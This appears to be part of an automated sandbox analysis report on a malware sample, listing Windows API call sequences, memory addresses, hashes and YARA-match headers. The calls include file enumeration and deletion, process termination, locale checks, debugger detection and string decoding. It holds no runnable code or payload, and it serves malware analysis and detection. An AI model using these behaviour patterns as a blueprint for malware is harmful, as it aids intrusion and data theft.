                                              • Opcode Fuzzy Hash: 922fd519c71b6af3ccb31eb3f6638551c52bf54377e7cc35e7fa9b6b37ebfbe3
                                              • Instruction Fuzzy Hash: 3DE1C6719012185AEB5DFB64DC91EEE7338AF54205F404BEDA90AA2061EFB07F89CF51
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215A8,00420BAF), ref: 0040DBEB
                                              • StrCmpCA.SHLWAPI(?,004215AC), ref: 0040DC33
                                              • StrCmpCA.SHLWAPI(?,004215B0), ref: 0040DC49
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DECC
                                              • FindClose.KERNEL32(000000FF), ref: 0040DEDE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                              • String ID:
                                              • API String ID: 3334442632-0
                                              • Opcode ID: 62dd4eb8aaf485a9b3b424bef752cb1b9e720914b8e7beaa3b58e856919e7599
                                              • Instruction ID: c85deeef17d72a94dc1f170446f25d55197e78b42259dde6f56d7dfc7a2e5770
                                              • Opcode Fuzzy Hash: 62dd4eb8aaf485a9b3b424bef752cb1b9e720914b8e7beaa3b58e856919e7599
                                              • Instruction Fuzzy Hash: 40917572A001049BCB14FBB1ED96DED733DAF84344F00456EF90666185EE38AB5CCB9A
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215A8,00420BAF), ref: 0484DE52
                                              • StrCmpCA.SHLWAPI(?,004215AC), ref: 0484DE9A
                                              • StrCmpCA.SHLWAPI(?,004215B0), ref: 0484DEB0
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0484E133
                                              • FindClose.KERNEL32(000000FF), ref: 0484E145
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                              • String ID:
                                              • API String ID: 3334442632-0
                                              • Opcode ID: 9542da5adebdb47cc6cff0dfe2dad098e23cc50c49b1f7ea439975f769b5948d
                                              • Instruction ID: d1dff57ae4ae0728b311f2b09244ddb9ed12c53b5cc4dbc18626308155835d0d
                                              • Opcode Fuzzy Hash: 9542da5adebdb47cc6cff0dfe2dad098e23cc50c49b1f7ea439975f769b5948d
                                              • Instruction Fuzzy Hash: 55915672A001089BDB18FBB4EC95DED7379AFD4205F004F6DAC46D6150EEB4BB488B92
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004216B0,00420D97), ref: 0484FA85
                                              • StrCmpCA.SHLWAPI(?,004216B4), ref: 0484FAD6
                                              • StrCmpCA.SHLWAPI(?,004216B8), ref: 0484FAEC
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0484FE18
                                              • FindClose.KERNEL32(000000FF), ref: 0484FE2A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                              • String ID:
                                              • API String ID: 3334442632-0
                                              • Opcode ID: 20d2439061f2986c118ea83818572df10c4fe56ef9868c5e75f33f4f1b478f52
                                              • Instruction ID: 6c1fbc9f2c174885dd6178f49d78e27a5a030f9cbbf4600bbe243e3e4e7a6ef7
                                              • Opcode Fuzzy Hash: 20d2439061f2986c118ea83818572df10c4fe56ef9868c5e75f33f4f1b478f52
                                              • Instruction Fuzzy Hash: ABB111719002189BDB68FB64DC94EED7375AF94305F404BAD990AD6160EFB07B48CF92
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00419905
                                              • Process32First.KERNEL32(00409FDE,00000128), ref: 00419919
                                              • Process32Next.KERNEL32(00409FDE,00000128), ref: 0041992E
                                              • StrCmpCA.SHLWAPI(?,00409FDE), ref: 00419943
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041995C
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0041997A
                                              • CloseHandle.KERNEL32(00000000), ref: 00419987
                                              • CloseHandle.KERNEL32(00409FDE), ref: 00419993
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                              • String ID:
                                              • API String ID: 2696918072-0
                                              • Opcode ID: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                              • Instruction ID: 9e175830caf9148bd7a219e001ec971bef60eefc02138b6d75eb658f8e5d4480
                                              • Opcode Fuzzy Hash: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                              • Instruction Fuzzy Hash: 94112EB5E15218ABCB24DFA0DC48BDEB7B9BB48700F00558DF509A6240EB749B84CF91
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04859B6C
                                              • Process32First.KERNEL32(0484A245,00000128), ref: 04859B80
                                              • Process32Next.KERNEL32(0484A245,00000128), ref: 04859B95
                                              • StrCmpCA.SHLWAPI(?,0484A245), ref: 04859BAA
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 04859BC3
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 04859BE1
                                              • CloseHandle.KERNEL32(00000000), ref: 04859BEE
                                              • CloseHandle.KERNEL32(0484A245), ref: 04859BFA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                              • String ID:
                                              • API String ID: 2696918072-0
                                              • Opcode ID: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                              • Instruction ID: b0ee55d6fd6480cb230b61a0dcf08457ba1f0a278d2dd5e3cd08cd85a9166229
                                              • Opcode Fuzzy Hash: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                              • Instruction Fuzzy Hash: 331121B5E05218EBDB24DFA5DC88BDE7779BB48700F008689F905E6250E734AB44CF51
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D79), ref: 0040E5A2
                                              • StrCmpCA.SHLWAPI(?,004215F0), ref: 0040E5F2
                                              • StrCmpCA.SHLWAPI(?,004215F4), ref: 0040E608
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040ECDF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                              • String ID: \*.*$@
                                              • API String ID: 433455689-2355794846
                                              • Opcode ID: fd4b8a02529220b5ed0f2464db00e78548197825fe913ecccb08edd01f2acd1a
                                              • Instruction ID: 078a0cb4b8b1302ba7a9d85fb6124db0b21cd0ebb254cebb7c4a92464ee22dab
                                              • Opcode Fuzzy Hash: fd4b8a02529220b5ed0f2464db00e78548197825fe913ecccb08edd01f2acd1a
                                              • Instruction Fuzzy Hash: A6128431A111185BCB14FB61DCA6EED7339AF54314F4045EFB10A62095EF386F98CB9A
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425244,?,?,?,004252EC,?,?,00000000,?,00000000), ref: 04841BCA
                                              • StrCmpCA.SHLWAPI(?,00425394), ref: 04841C1A
                                              • StrCmpCA.SHLWAPI(?,0042543C), ref: 04841C30
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 04841FE7
                                              • DeleteFileA.KERNEL32(00000000), ref: 04842071
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 048420C7
                                              • FindClose.KERNEL32(000000FF), ref: 048420D9
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                              • String ID:
                                              • API String ID: 1415058207-0
                                              • Opcode ID: 56f2edb5ed5ac7363b7b2ebd9afdb303bb2dbb6ba0bbe840f4244a047c0a7428
                                              • Instruction ID: cfa1b80422c945df5bba81980ef13779be0be5e6765ea568c14417dea0953c73
                                              • Opcode Fuzzy Hash: 56f2edb5ed5ac7363b7b2ebd9afdb303bb2dbb6ba0bbe840f4244a047c0a7428
                                              • Instruction Fuzzy Hash: 7B12CE719002189BDB5DFB64DC94EED7379AF54305F404BE9990AA20A0EFB47B88CF52
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004215B8,00420C32), ref: 0484E1C5
                                              • StrCmpCA.SHLWAPI(?,004215C0), ref: 0484E215
                                              • StrCmpCA.SHLWAPI(?,004215C4), ref: 0484E22B
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0484E747
                                              • FindClose.KERNEL32(000000FF), ref: 0484E759
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                              • String ID:
                                              • API String ID: 2325840235-0
                                              • Opcode ID: 331afb331abdd3764059b67a16730e5bc1ed144ae4cc64f7786a3dfac513c809
                                              • Instruction ID: c2702fdd6259246670b1b794e13735dd6a864b60c6c171e281d2e6d9f008b476
                                              • Opcode Fuzzy Hash: 331afb331abdd3764059b67a16730e5bc1ed144ae4cc64f7786a3dfac513c809
                                              • Instruction Fuzzy Hash: BBF1A0719142289ADB5DFB64DCD4EEE7334AF54305F804BDA985AA2060EFB07F88CE51
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 00417D71
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00417D89
                                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417D9D
                                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417DF2
                                              • LocalFree.KERNEL32(00000000), ref: 00417EB2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                              • String ID: /
                                              • API String ID: 3090951853-4001269591
                                              • Opcode ID: a9c2a3d8980f824397494a6f3138396e161b863b8c8af303ecba9acef840721c
                                              • Instruction ID: 3a7f69f4b1fea99afaf6d133ce9a777b30b3333c02d8fb4e8698743120f63e4e
                                              • Opcode Fuzzy Hash: a9c2a3d8980f824397494a6f3138396e161b863b8c8af303ecba9acef840721c
                                              • Instruction Fuzzy Hash: 1C416D71945218ABCB24DB94DC99BEEB374FF44704F2041DAE10A62280DB386FC4CFA9
                                              APIs
                                              • memset.MSVCRT ref: 0040C953
                                              • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02C9EDF0), ref: 0040C971
                                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
                                              • memcpy.MSVCRT(?,?,?), ref: 0040CA12
                                              • lstrcatA.KERNEL32(?,00420B47), ref: 0040CA43
                                              • lstrcatA.KERNEL32(?,00420B4B), ref: 0040CA57
                                              • lstrcatA.KERNEL32(?,00420B4E), ref: 0040CA78
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                              • String ID:
                                              • API String ID: 1498829745-0
                                              • Opcode ID: b72dd9bfbf458160f1e602edd60bafd9c1ab3fe4aebb36f7fc77a597216b37cf
                                              • Instruction ID: ab8a272bb0ac48908ccb48df32c4a676bf2e37b68a454f4a62162a4422f92537
                                              • Opcode Fuzzy Hash: b72dd9bfbf458160f1e602edd60bafd9c1ab3fe4aebb36f7fc77a597216b37cf
                                              • Instruction Fuzzy Hash: FD4130B4E0421DDBDB10CFA4DD89BEEB7B9BB48304F1042AAF509A62C0D7745A84CF95
                                              APIs
                                              • memset.MSVCRT ref: 0484CBBA
                                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0484CBD8
                                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0484CBE3
                                              • memcpy.MSVCRT(?,?,?), ref: 0484CC79
                                              • lstrcat.KERNEL32(?,00420B47), ref: 0484CCAA
                                              • lstrcat.KERNEL32(?,00420B4B), ref: 0484CCBE
                                              • lstrcat.KERNEL32(?,00420B4E), ref: 0484CCDF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                              • String ID:
                                              • API String ID: 1498829745-0
                                              • Opcode ID: bfbaf21689b8136d467466e44178197795bb6f205839b656af30e0f0eb0eb3c5
                                              • Instruction ID: c5142127612bbdf015ae0baed0342578d614286f0b44af2c1b7746dad7d27a6c
                                              • Opcode Fuzzy Hash: bfbaf21689b8136d467466e44178197795bb6f205839b656af30e0f0eb0eb3c5
                                              • Instruction Fuzzy Hash: 54415EB4D0521DEBDB10CFA4DD88BEEBBB9BB44304F1046A9E509A7280D7746B84CF91
                                              APIs
                                              • IsDebuggerPresent.KERNEL32 ref: 0041BEA2
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BEB7
                                              • UnhandledExceptionFilter.KERNEL32(eM), ref: 0041BEC2
                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BEDE
                                              • TerminateProcess.KERNEL32(00000000), ref: 0041BEE5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                              • String ID: eM
                                              • API String ID: 2579439406-4107679315
                                              • Opcode ID: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                              • Instruction ID: e0cf9fd370cfefa4586a3e07c7ad2671862445e1fb84a52232205764a1bb9e34
                                              • Opcode Fuzzy Hash: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                              • Instruction Fuzzy Hash: FC21CCB8902214DFC710DF69FC85A883BB4FB18314F12807BE90887262E7B499818F5D
                                              APIs
                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
                                              • LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
                                              • LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: BinaryCryptLocalString$AllocFree
                                              • String ID: >O@
                                              • API String ID: 4291131564-3498640338
                                              • Opcode ID: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                              • Instruction ID: de78b312e53d8eb1032a325daaba17a5ad67a9fc4c37dbc2dcfee383a82f1a49
                                              • Opcode Fuzzy Hash: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                              • Instruction Fuzzy Hash: 3B11D474641308AFEB10CF64DC95FAA77B5EB88B04F208099FD159B3D0C776AA41CB50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: \u$\u${${$}$}
                                              • API String ID: 0-582841131
                                              • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                              • Instruction ID: 4e5f1913899ebd1c086ce1faf3250eea9b45de10e20eb1a9b8e67dda958389be
                                              • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                              • Instruction Fuzzy Hash: D641AA22E09BC9C5DB018F7844A02BEBFB26FE6210F5D479AC4985F382C7B4515AD3A5
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                              • GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 04857FD8
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 04857FF0
                                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 04858004
                                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 04858059
                                              • LocalFree.KERNEL32(00000000), ref: 04858119
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                              • String ID:
                                              • API String ID: 3090951853-0
                                              • Opcode ID: a4d0a0c2b3a684d2ad9d0c86ecadcb3cbe89c53720147a644a945addcb2b8918
                                              • Instruction ID: 562e11e3983d0c0ccce516951f8ca92c3b06fb8b95f8e249ab4f6e41aa4a0fe5
                                              • Opcode Fuzzy Hash: a4d0a0c2b3a684d2ad9d0c86ecadcb3cbe89c53720147a644a945addcb2b8918
                                              • Instruction Fuzzy Hash: 99415E71941228ABDB28EF94DC88FEDB374FF44704F10469AE809A21A0DB746F88CF51
                                              APIs
                                              • IsDebuggerPresent.KERNEL32 ref: 0485C109
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0485C11E
                                              • UnhandledExceptionFilter.KERNEL32(0041F2B0), ref: 0485C129
                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 0485C145
                                              • TerminateProcess.KERNEL32(00000000), ref: 0485C14C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                              • String ID:
                                              • API String ID: 2579439406-0
                                              • Opcode ID: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                              • Instruction ID: e5601b4870d5f7f5a9614f604f6a2b831c8557bde2c27ad248cb3da13475647b
                                              • Opcode Fuzzy Hash: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                              • Instruction Fuzzy Hash: 5921DDB8902314DFDB10DF69F885A883BB4FB08314F12817BE91887271E7B1A9818F1D
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0), ref: 004072AD
